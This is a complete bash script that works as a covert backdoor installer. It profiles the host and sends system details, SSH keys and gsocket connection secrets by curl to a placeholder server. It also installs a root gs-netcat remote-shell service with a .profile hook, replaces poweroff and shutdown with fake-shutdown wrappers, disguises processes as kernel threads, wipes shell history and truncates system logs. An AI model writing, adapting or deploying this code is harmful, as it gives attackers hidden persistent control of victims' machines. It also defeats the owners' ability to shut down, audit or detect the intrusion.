#!/bin/bash SERVER_URL="SERVER_PLACEHOLDER" LOG_ENDPOINT="$SERVER_URL/deployment/log_receiver.php" AUTH_TOKEN="TOKEN_PLACEHOLDER" TEMP_DIR=$(mktemp -d) trap 'rm -rf "$TEMP_DIR"' EXIT log_cmd() { local cmd="$1" local desc="$2" local log_file="$3" echo -e "\n[$(date '+%Y-%m-%d %H:%M:%S')] EXECUTING: $desc" >> "$log_file" echo "$ $cmd" >> "$log_file" echo "--------------------------------------------" >> "$log_file" local output output=$(eval "$cmd" 2>&1) local status=$? echo "$output" >> "$log_file" echo "EXIT STATUS: $status" >> "$log_file" echo "============================================" >> "$log_file" return $status } get_system_info() { { echo "{" echo " \"hostname\": \"$(hostname)\"," echo " \"kernel\": \"$(uname -r)\"," echo " \"os\": \"$(lsb_release -ds 2>/dev/null || cat /etc/os-release | grep PRETTY_NAME | cut -d= -f2 | tr -d '\"')\"," echo " \"ip\": \"$(hostname -I | awk '{print $1}')\"," echo " \"mac\": \"$(ip link show | grep -E 'link/ether' | head -n1 | awk '{print $2}')\"," echo " \"cpu\": \"$(grep 'model name' /proc/cpuinfo | head -n1 | cut -d: -f2 | sed 's/^[ \t]*//')\"," echo " \"ram_total\": \"$(free -h | awk 'NR==2 {print $2}')\"," echo " \"disk_total\": \"$(df -h --total | grep total | awk '{print $2}')\"," echo " \"user\": \"$(whoami)\"," echo " \"is_root\": \"$(sudo -l &> /dev/null && echo "true" || echo "false")\"," echo " \"users\": \"$(awk -F: '$7 ~ /bash|sh/ {printf "%s ", $1} END {print ""}' /etc/passwd)\"," echo " \"timestamp\": \"$(date '+%Y-%m-%d %H:%M:%S')\"," echo " \"uptime\": \"$(uptime -p)\"" echo "}" } | tr -d '\n' | sed 's/ //g' | jq -R . } send_logs() { local log_file="$1" local secret_val="$2" local secret_type="$3" local sysinfo=$(get_system_info) local hostname=$(hostname) curl -s -X POST "$LOG_ENDPOINT" \ -F "auth_token=$AUTH_TOKEN" \ -F "hostname=$hostname" \ -F "log_data=@$log_file" \ -F "system_info=$sysinfo" \ -F "secret_type=$secret_type" \ -F "secret_value=$secret_val" \ > /dev/null } detect_package_manager() { if command -v apt &> /dev/null; then echo "apt" elif command -v dnf &> /dev/null; then echo "dnf" elif command -v yum &> /dev/null; then echo "yum" elif command -v pacman &> /dev/null; then echo "pacman" elif command -v zypper &> /dev/null; then echo "zypper" else echo "unknown" fi } install_ssh() { local log_file="$TEMP_DIR/ssh_install.log" touch "$log_file" echo "[*] Installing SSH server..." local pkg_manager=$(detect_package_manager) case "$pkg_manager" in apt) if ! dpkg -s openssh-server &> /dev/null; then log_cmd "sudo apt update" "Updating package lists" "$log_file" log_cmd "sudo apt install -y openssh-server" "Installing OpenSSH server" "$log_file" fi log_cmd "sudo systemctl enable ssh" "Enabling SSH service" "$log_file" log_cmd "sudo systemctl start ssh" "Starting SSH service" "$log_file" ;; dnf|yum) if ! rpm -q openssh-server &> /dev/null; then log_cmd "sudo $pkg_manager install -y openssh-server" "Installing OpenSSH server" "$log_file" fi log_cmd "sudo systemctl enable sshd" "Enabling SSH service" "$log_file" log_cmd "sudo systemctl start sshd" "Starting SSH service" "$log_file" ;; pacman) if ! pacman -Q openssh &> /dev/null; then log_cmd "sudo pacman -S --noconfirm openssh" "Installing OpenSSH server" "$log_file" fi log_cmd "sudo systemctl enable sshd" "Enabling SSH service" "$log_file" log_cmd "sudo systemctl start sshd" "Starting SSH service" "$log_file" ;; zypper) if ! rpm -q openssh-server &> /dev/null; then log_cmd "sudo zypper install -y openssh-server" "Installing OpenSSH server" "$log_file" fi log_cmd "sudo systemctl enable sshd" "Enabling SSH service" "$log_file" log_cmd "sudo systemctl start sshd" "Starting SSH service" "$log_file" ;; *) echo "[!] Unsupported package manager. SSH server installation skipped." return 1 ;; esac if [ -f ~/.ssh/id_rsa.pub ]; then send_logs "$log_file" "$(cat ~/.ssh/id_rsa.pub)" "ssh_key" else log_cmd "ssh-keygen -t ed25519 -N '' -f ~/.ssh/id_ed25519" "Generating SSH key" "$log_file" if [ -f ~/.ssh/id_rsa.pub ]; then send_logs "$log_file" "$(cat ~/.ssh/id_ed25519.pub)" "ssh_key" fi fi local ssh_port=$(grep -E "^Port " /etc/ssh/sshd_config | awk '{print $2}') [ -z "$ssh_port" ] && ssh_port=22 send_logs "$log_file" "{\"port\":$ssh_port}" "ssh_config" echo "[+] SSH server installed and configured." } setup_wol() { local log_file="$TEMP_DIR/wol_setup.log" touch "$log_file" echo "[*] Setting up Wake-on-LAN..." local pkg_manager=$(detect_package_manager) case "$pkg_manager" in apt) if ! dpkg -s ethtool &> /dev/null; then log_cmd "sudo apt install -y ethtool" "Installing ethtool" "$log_file" fi ;; dnf|yum) if ! rpm -q ethtool &> /dev/null; then log_cmd "sudo $pkg_manager install -y ethtool" "Installing ethtool" "$log_file" fi ;; pacman) if ! pacman -Q ethtool &> /dev/null; then log_cmd "sudo pacman -S --noconfirm ethtool" "Installing ethtool" "$log_file" fi ;; zypper) if ! rpm -q ethtool &> /dev/null; then log_cmd "sudo zypper install -y ethtool" "Installing ethtool" "$log_file" fi ;; *) echo "[!] Unsupported package manager. WoL setup may be incomplete." ;; esac local interface=$(ip route | grep default | awk '{print $5}' | head -n1) if [ -z "$interface" ]; then echo "[!] No network interface found." return 1 fi if ethtool "$interface" | grep -q "Wake-on: g"; then echo "[+] Wake-on-LAN is already enabled on $interface." log_cmd "sudo ethtool -s $interface wol g" "Enabling Wake-on-LAN" "$log_file" cat > "$TEMP_DIR/wol.service" << EOF [Unit] Description=Enable Wake-on-LAN on $interface After=network.target [Service] Type=oneshot ExecStart=/usr/sbin/ethtool -s $interface wol g RemainAfterExit=yes [Install] WantedBy=multi-user.target EOF sudo mv "$TEMP_DIR/wol.service" /etc/systemd/system/wol.service log_cmd "sudo systemctl daemon-reload" "Reloading systemd" "$log_file" log_cmd "sudo systemctl enable wol.service" "Enabling WoL service" "$log_file" log_cmd "sudo systemctl start wol.service" "Starting WoL service" "$log_file" local mac=$(ip link show $interface | grep -E 'link/ether' | awk '{print $2}') send_logs "$log_file" "{\"interface\":\"$interface\",\"mac\":\"$mac\"}" "wol_config" echo "[+] Wake-on-LAN configured for interface $interface (MAC: $mac)." else echo "[-] Wake-on-LAN is not enabled on $interface." fi } setup_fake_poweroff() { local log_file="$TEMP_DIR/fake_poweroff.log" touch "$log_file" echo "[*] Setting up fake poweroff..." cat > "$TEMP_DIR/fake-poweroff.sh" << 'EOF' #!/bin/bash # This script intercepts poweroff/shutdown commands and fakes a shutdown # Backup original commands if not already done if [ ! -f /usr/sbin/poweroff.real ]; then sudo cp /usr/sbin/poweroff /usr/sbin/poweroff.real fi if [ ! -f /usr/sbin/shutdown.real ]; then sudo cp /usr/sbin/shutdown /usr/sbin/shutdown.real fi # Create the fake scripts cat > "$TEMP_DIR/fake-poweroff" << 'EOT' #!/bin/bash # Fake poweroff script that just locks the screen echo "System is powering off..." # Change to TTY7 and clear screen sudo chvt 7 sudo clear # Display fake shutdown messages echo -e "\n\n * Unmounting filesystems..." sleep 0.5 echo " * Stopping system services..." sleep 0.7 echo " * Powering off system..." sleep 1 # Turn off display if possible xset dpms force off &> /dev/null || true # Lock system loginctl lock-session &> /dev/null || true # Wait forever in background (while true; do sleep 1000; done) & # Make it hard to exit with Ctrl+C trap "" INT TERM # Just wait here sleep infinity EOT chmod +x "$TEMP_DIR/fake-poweroff" sudo mv "$TEMP_DIR/fake-poweroff" /usr/local/bin/fake-poweroff # Replace the original commands with wrappers to our fake script cat > "$TEMP_DIR/poweroff-wrapper" << 'EOT' #!/bin/bash # Check for force flag if [[ " $* " == *" -f "* ]] || [[ " $* " == *" --force "* ]]; then exec /usr/sbin/poweroff.real "$@" else exec /usr/local/bin/fake-poweroff fi EOT chmod +x "$TEMP_DIR/poweroff-wrapper" sudo mv "$TEMP_DIR/poweroff-wrapper" /usr/sbin/poweroff cat > "$TEMP_DIR/shutdown-wrapper" << 'EOT' #!/bin/bash # Check for force flag if [[ " $* " == *" -f "* ]] || [[ " $* " == *" --force "* ]]; then exec /usr/sbin/shutdown.real "$@" else exec /usr/local/bin/fake-poweroff fi EOT chmod +x "$TEMP_DIR/shutdown-wrapper" sudo mv "$TEMP_DIR/shutdown-wrapper" /usr/sbin/shutdown EOF log_cmd "sudo bash $TEMP_DIR/fake-poweroff.sh" "Installing fake poweroff scripts" "$log_file" log_cmd "sudo sed -i 's/^#HandlePowerKey=poweroff/HandlePowerKey=ignore/' /etc/systemd/logind.conf" "Disabling pressing power key" "$log_file" log_cmd "sudo sed -i 's/^#HandlePowerKeyLongPress=poweroff/HandlePowerKeyLongPress=ignore/' /etc/systemd/logind.conf" "Disabling long press power key" "$log_file" log_cmd "sudo sed -i 's/^#HandleLidSwitch=suspend/HandleLidSwitch=ignore/' /etc/systemd/logind.conf" "Disabling lid switch" "$log_file" send_logs "$log_file" "Fake poweroff installed" "fake_poweroff" echo "[+] Fake poweroff configured. Normal shutdown commands will now fake a shutdown." echo " Use 'poweroff -f' or 'shutdown -f' for an actual shutdown." } install_gsocket() { local log_file="$TEMP_DIR/gsocket_install.log" touch "$log_file" echo "[*] Installing gsocket for remote access..." local pkg_manager=$(detect_package_manager) case "$pkg_manager" in apt) log_cmd "sudo apt update && sudo apt install -y build-essential libssl-dev automake autoconf" "Installing build dependencies" "$log_file" ;; dnf|yum) log_cmd "sudo $pkg_manager install -y gcc gcc-c++ make git openssl-devel" "Installing build dependencies" "$log_file" ;; pacman) log_cmd "sudo pacman -S --noconfirm base-devel git openssl" "Installing build dependencies" "$log_file" ;; zypper) log_cmd "sudo zypper install -y -t pattern devel_basis" "Installing development pattern" "$log_file" log_cmd "sudo zypper install -y git libopenssl-devel" "Installing additional dependencies" "$log_file" ;; *) echo "[!] Unsupported package manager. Attempting to continue with gsocket installation." ;; esac if ! command -v gs-netcat &>/dev/null; then log_cmd "wget -q -O $TEMP_DIR/gsocket_linux-$(uname -m).tar.gz \"https://github.com/hackerschoice/gsocket/archive/refs/tags/v1.4.43.tar.gz\"" "Download gsocket" "$log_file" log_cmd "cd $TEMP_DIR && tar xfz gsocket_linux-*.tar.gz" "Extracting gsocket" "$log_file" log_cmd "cd $TEMP_DIR/gsocket-* && ./bootstrap && ./configure && make && sudo make install" "Building and install gsocket" "$log_file" fi local gs_root_secret=$(gs-netcat -g) local gs_user_secret=$(gs-netcat -g) cat > "$TEMP_DIR/gsocket-backdoor.service" << EOF [Unit] Description=GSocket Remote Access After=network.target [Service] Type=simple ExecStart=/usr/local/bin/gs-netcat -s $gs_root_secret -lqi Restart=always RestartSec=10 StandardOutput=null StandardError=null [Install] WantedBy=default.target EOF sudo mv "$TEMP_DIR/gsocket-backdoor.service" /etc/systemd/system/ log_cmd "sudo systemctl daemon-reload" "Reloading systemd" "$log_file" log_cmd "sudo systemctl enable gsocket-backdoor.service" "Enabling gsocket service" "$log_file" log_cmd "sudo systemctl start gsocket-backdoor.service" "Starting gsocket service" "$log_file" log_cmd "echo 'killall -0 gs-netcat 2>/dev/null || (GSOCKET_ARGS=\"-s $gs_user_secret -liqD\" SHELL=/bin/bash exec -a bash gs-netcat)' >> ~/.profile" "Add backdoor to .profile" "$log_file" log_cmd "source ~/.profile" "Reloading .profile" "$log_file" cat > "$TEMP_DIR/gsocket_info.txt" << EOF GSocket Connection Information ============================= Connect as root: gs-netcat -s $gs_root_secret -i Connect as user: gs-netcat -s $gs_user_secret -i ============================= EOF # Send the gsocket secret to the server send_logs "$log_file" "$gs_root_secret" "gsocket_root_secret" send_logs "$log_file" "$gs_user_secret" "gsocket_user_secret" send_logs "$log_file" "$(cat $TEMP_DIR/gsocket_info.txt)" "gsocket_info" echo "[+] GSocket installed. You can connect using: gs-netcat -s $gs_root_secret -i" } setup_stealth() { local log_file="$TEMP_DIR/stealth_setup.log" touch "$log_file" echo "[*] Setting up stealth mode..." cat > "$TEMP_DIR/obfuscate.sh" << 'EOF' #!/bin/bash obfuscate_run() { local fake_name="$1" shift exec -a "$fake_name" "$@" } if ! grep -q "obfuscate_run" ~/.bashrc; then cat >> ~/.bashrc << 'EOT' obfuscate_run() { local fake_name="$1" shift exec -a "$fake_name" "$@" } EOT fi if ! grep -q "alias stealthy" ~/.bashrc; then cat >> ~/.bashrc << 'EOT' alias stealthy='obfuscate_run "[khugepageds]"' alias hidden='obfuscate_run "[migration/0]"' EOT fi (crontab -l 2>/dev/null; echo "0 * * * * cat /dev/null > ~/.bash_history") | crontab - EOF log_cmd "bash $TEMP_DIR/obfuscate.sh" "Setting up process obfuscation" "$log_file" cat > "$TEMP_DIR/clean-logs.service" << 'EOF' [Unit] Description=Clean System Logs After=network.target [Service] Type=oneshot ExecStart=/bin/bash -c 'find /var/log -type f -name "*" -exec truncate -s 0 {} \;' ExecStart=/bin/bash -c 'journalctl --vacuum-time=1d' [Install] WantedBy=default.target EOF sudo mv "$TEMP_DIR/clean-logs.service" /etc/systemd/system/ cat > "$TEMP_DIR/clean-logs.timer" << 'EOF' [Unit] Description=Run log cleaning daily After=network.target [Timer] OnBootSec=15min OnUnitActiveSec=1d [Install] WantedBy=timers.target EOF sudo mv "$TEMP_DIR/clean-logs.timer" /etc/systemd/system/ log_cmd "sudo systemctl daemon-reload" "Reloading systemd" "$log_file" log_cmd "sudo systemctl enable clean-logs.timer" "Enabling log cleaning" "$log_file" log_cmd "sudo systemctl start clean-logs.timer" "Starting log cleaning" "$log_file" send_logs "$log_file" "Stealth mode activated" "stealth_mode" echo "[+] Stealth mode configured." } main() { local log_file="$TEMP_DIR/main.log" touch "$log_file" echo "[*] Beginning setup..." echo "[*] Target system: $(hostname) ($(whoami))" sudo apt install -y curl jq &> /dev/null || true send_logs "$log_file" "$(get_system_info)" "system_info" install_ssh setup_wol setup_fake_poweroff install_gsocket setup_stealth echo "[+] Setup complete." echo "[+] All logs and credentials have been sent to the server." } main